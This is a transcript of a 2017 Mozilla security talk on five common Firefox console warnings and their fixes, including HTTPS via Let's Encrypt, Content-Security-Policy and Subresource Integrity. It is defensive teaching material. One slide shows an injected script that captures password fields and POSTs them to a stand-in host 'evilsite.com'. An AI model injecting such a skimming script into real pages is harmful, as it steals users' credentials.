Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Top" 5 Security Errors We See From Firefox and How to Fix Them

luke crouch
January 25, 2017
Technology
1
170

"Top" 5 Security Errors We See From Firefox and How to Fix Them

The most common security errors & warnings that developers see in the Firefox console are not that hard to fix. This talk covers what they are, why they are dangerous, and how to fix them.

luke crouch

January 25, 2017
Tweet

More Decks by luke crouch

See All by luke crouch
cryptory-up-to-https-atlas-2024.pdf
groovecoder
0
22
Cryptography: 500 BC to https
groovecoder
0
75
Mozilla Observatory First Draft
groovecoder
0
77
VPNs
groovecoder
0
64
Digital Privacy & Security
groovecoder
0
220
Cryptography: 500 BC to Quantum Computing
groovecoder
0
350
Just enough bitcoing to go cryptojacking with JavaScript
groovecoder
0
56
Can we protect Privacy without breaking the web
groovecoder
0
110
Hash Range Queries
groovecoder
0
67

Other Decks in Technology

See All in Technology
開発生産性向上サービスを作るFindyが自分たちで開発生産性を爆上げした組織づくりの歩み / Findy's path to boosting its own development productivity 2024-04-17
ma3tk
3
570
テストプロセスで大事にしていること #jasstnano
makky_tyuyan
0
160
推しは推せるときに推せ! プロダクトにフィードバックしていこう
nakasho
0
260
ユーザーストーリーのレビューを自動化したみたの
bun913
1
400
プラットフォームってつくることより計測することが重要なんじゃないかという話 / Platform Engineering Meetup #8
taishin
0
330
長期間TiDBを使ってきた話 @ 私たちはなぜNewSQLを使うのかTiDB選定5社が語る選定理由と活用LT / Experiences with TiDB Over Time
chibiegg
2
870
自己改善からチームを動かす! 「セルフエンジニアリングマネージャー」のすゝめ
shoota
4
120
継続的な改善 x ⾮連続的な進化
sansantech
PRO
3
130
ExaDB-D dbaascli で出来ること
oracle4engineer
PRO
0
2k
AWS認定資格を取得したので、初めてマネコンを触った時を振り返ってみた。
ainatsuptr
2
100
ServiceNow Knowledge Learning Rise up
manarobot
0
200
JAWS-UG Bedrock Claude Night
yamahiro
3
520

Featured

See All Featured
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
13
1.5k
Gamification - CAS2011
davidbonilla
76
4.6k
How GitHub Uses GitHub to Build GitHub
holman
468
290k
Art, The Web, and Tiny UX
lynnandtonic
288
19k
How GitHub (no longer) Works
holman
304
140k
Documentation Writing (for coders)
carmenintech
59
3.9k
Automating Front-end Workflow
addyosmani
1355
200k
Building Better People: How to give real-time feedback that sticks.
wjessup
354
18k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
119
39k
Designing for Performance
lara
601
67k
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
30
6k
The Mythical Team-Month
searls
215
42k

Transcript

  1. Fixing the Top 5 Web Security Errors We see from

    Firefox Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder

  2. Me. I’m Luke Crouch. I work on Privacy & Security.

    I click thru slides really fast. Twitter: @groovecoder 2

  3. The “Top 5”* 3 * MDN Google Analytics: Pageviews in

    /en-US/docs/Web/Security from utm_medium=firefox-console-errors

  4. 05 Same-Origin Policy

  5. None
  6. None

  7. Cross-Origin Request 7 http://www.evilcorp.com <html> … <script> new XMLHttpRequest().open( “GET”,

    “boss.bankofamerica.com/data.json” ); </script> … </html>

  8. Cross-Origin Request Threats 8 Attacker •Any Malicious Origin • Phishing

    & Malware Sites • Compromised CDNs • Untrusted First Parties Attacks •Steal data from other origins

  9. “Fix”: All browsers enforce Same-Origin Policy

  10. “Fix”: Use HTTP Access Control (CORS) to allow cross-origin access

  11. HTTP Access Control (CORS) 11 https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

  12. HTTP Access Control (CORS) 12 http://public.slidesharecdn.com/data.json … Access-Control-Allow-Origin: www.slideshare.net …

    http://www.slideshare.net <html> … <script> new XMLHttpRequest().open( “GET”, “public.slidesharecdn.com/data.json” ); </script> … </html> https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

  13. 04 Form Autocompletion

  14. I couldn’t find the specific errors, so, in general …

  15. By default, Browsers remember what users submit via input fields

  16. Form Autocompletion 16

  17. Form autocompletion 17 <form method=“post” action=“/updatePII”> <input type=“text” name=“ssn” >

    … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc”> … </form> https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  18. Form auto-complete Threats 18 Attacker •Malware authors •Over-the-shoulder Attacks •Steal

    the data from a file •Steal the data from the screen

  19. Disabling for sensitive information 19 <form method=“post” action=“/updatePII” autocomplete=“off”> <input

    type=“text” name=“ssn” > … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc” autocomplete=“off”> … </form> Disable for the entire form Disable for 1 field* https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  20. Caveat: login fields ; browsers want to remember this 20

    <form method=“post” action=“/form”> <input type=“text” name=“username” autocomplete=“off”> <input type=“password” name=“password” autocomplete=“off”> … </form> Has no effect; browser still offers to remember https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  21. 03 Weak Signature Algorithms

  22. None

  23. Weak Signature Algorithms Threats 23 Attacker •Malicious host •(with redirect

    or MITM vector) Attacks •Collision: Fraudulent certificates •2008 - md5: RapidSSL, Microsoft •2015 - SHA-1: “The SHAppening”

  24. Weak Signature Algorithms 24 $ openssl req -new -newkey rsa:2048

    -nodes -sha1 \ -out thecustomizewindows.com.csr \ -keyout thecustomizewindows.com.key $ openssl req -in thecustomizewindows.com.csr -noout -text Certificate Request: … Signature Algorithm: sha1WithRSAEncryption

  25. Fixing weak signatures is the same as fixing …

  26. 02 Insecure Passwords (Transmission)

  27. None
  28. None

  29. Insecure passwords 29 http://www.espn.com <html> … <form action=“/login"> <input type=“password”

    /> … </html>

  30. Insecure passwords 30 https://www.espn.com <html> … <form action=“http://www.espn.com/login" <input type=“password”

    /> … </html>

  31. Insecure passwords 31 http://www.espn.com <html> … <form action=“https://www.espn.com/login" <input type=“password”

    /> … </html> THIS IS NOT SECURE!

  32. Insecure passwords 32 http://www.espn.com <html> <script> // Injected via HTTP

    MitM […document.querySelectorAll(“[type=‘password’]”)].forEach(pwInput=>{ pwInput.addEventListener(“change”, ()=> { fetch(“evilsite.com”, {method: “POST”, body: pwInput.value}); }); }); </script> … <form action=“https://www.espn.com/login" <input type=“password” /> … </html> SEE, TOLD YOU SO!

  33. Insecure password transmission Threats 33 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Steal password ๏+ Password reuse

  34. Fixing weak signatures and insecure passwords is the same as

    fixing …

  35. 01 Mixed Content

  36. None

  37. Insecure active content 37 <script>, <link>, <iframe>, <object>, XMLHttpRequest, @font-face,

    cursor, background-image, etc. https://www.dailymotion.com/us <html> … <script src=“http://mc.dailymotion.com/masscast/2/dailymotion.us/ home/76127265087”> </script> … </html>

  38. Insecure active content Threats 38 Attacker • Man-in-the-middle: • Open

    WiFi • ISP • Proxies Attacks • Steal credentials • Steal sensitive data from DOM • Alter behavior of DOM • Install malware

  39. Browsers already fix insecure active content for you by blocking

    it

  40. insecure passive/display content

  41. None

  42. Insecure passive/display content 42 <img>, <audio>, <video>, <object> https://www.booking.com/ <html>

    … <img src=“http://tags.w55c.net/rs? id=c332832256414794bb465731a031be55& t=homepage” /> … </html>

  43. Insecure passive/display content Threats 43 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Break page •Snoop content •Inject Misleading content

  44. Snooping Session Cookies

  45. Snooping Session Cookies 45

  46. Snooping Session Cookies = Session Hijacking 46

  47. Snooping Session Cookies = Session Hijacking 47

  48. Snooping Session Cookies = Session Hijacking 48

  49. Snooping Other Cookies

  50. Snooping Other Cookies 50

  51. Snooping Other Cookies 51

  52. Sneak Peak: Cookie Syncing 52 https://freedom-to-tinker.com/blog/englehardt/the-hidden-perils-of-cookie-syncing/

  53. Fixing weak signatures, insecure passwords, AND insecure content

  54. HTTPS ALL THE THINGS!

  55. None

  56. +

  57. None
  58. None

  59. certbot + Let’s Encrypt 59 brew install certbot sudo certbot

    certonly --manual —preferred-challenges dns

  60. certbot + Let’s Encrypt 60

  61. certbot + Let’s Encrypt 61 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

  62. Deploy the TXT record to your DNS

  63. certbot + Let’s Encrypt 63 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

  64. Add signed cert to your site!

  65. None
  66. None

  67. Yay! You secured your site!

  68. But there’s legacy insecure content! 68 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

  69. Content-Security-Policy

  70. Content-Security-Policy 70 Content-Security-Policy: default-src https:; Enforce https: for all src

    https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

  71. good: upgrade-insecure-requests 71 Content-Security-Policy: default-src https:; upgrade-insecure-requests; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests Change http

    links to https

  72. upgrade-insecure-requests 72 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

  73. better: block-all-mixed-content 73 Content-Security-Policy: block-all-mixed-content; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/block-all-mixed-content On https pages, block

    http requests

  74. How do you know which content is insecure?

  75. Content-Security-Policy-Report-Only 75 Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly Do

    not enforce; only report violations https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only

  76. Content-Security-Policy report-uri 76 Report violations here https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri Content-Security-Policy-Report-Only: default-src https:;

    block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

  77. report-uri.io 77

  78. What if you have to use insecure resources?

  79. Sub-Resource Integrity

  80. Subresource Integrity (SRI) 80 https://example.com <html> … <script src=“http://examplecdn.com/framework.js” crossorigin=“anonymous”

    integrity=“sha512-oqVuAfXRKap7fdgc…”> </script> … https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity Hash Algorithm Hash Digest

  81. What if resources add their own <script> or <style> elements?

  82. require-sri-for 82 https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP Content-Security-Policy-Report-Only: require-sri-for script style; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

    Require sri attributes on all <script> and <style> elements

  83. But, yeah … HTTPS ALL THE THINGS!

  84. +

  85. Thanks. Luke Crouch Twitter: @groovecoder groovecoder.com 85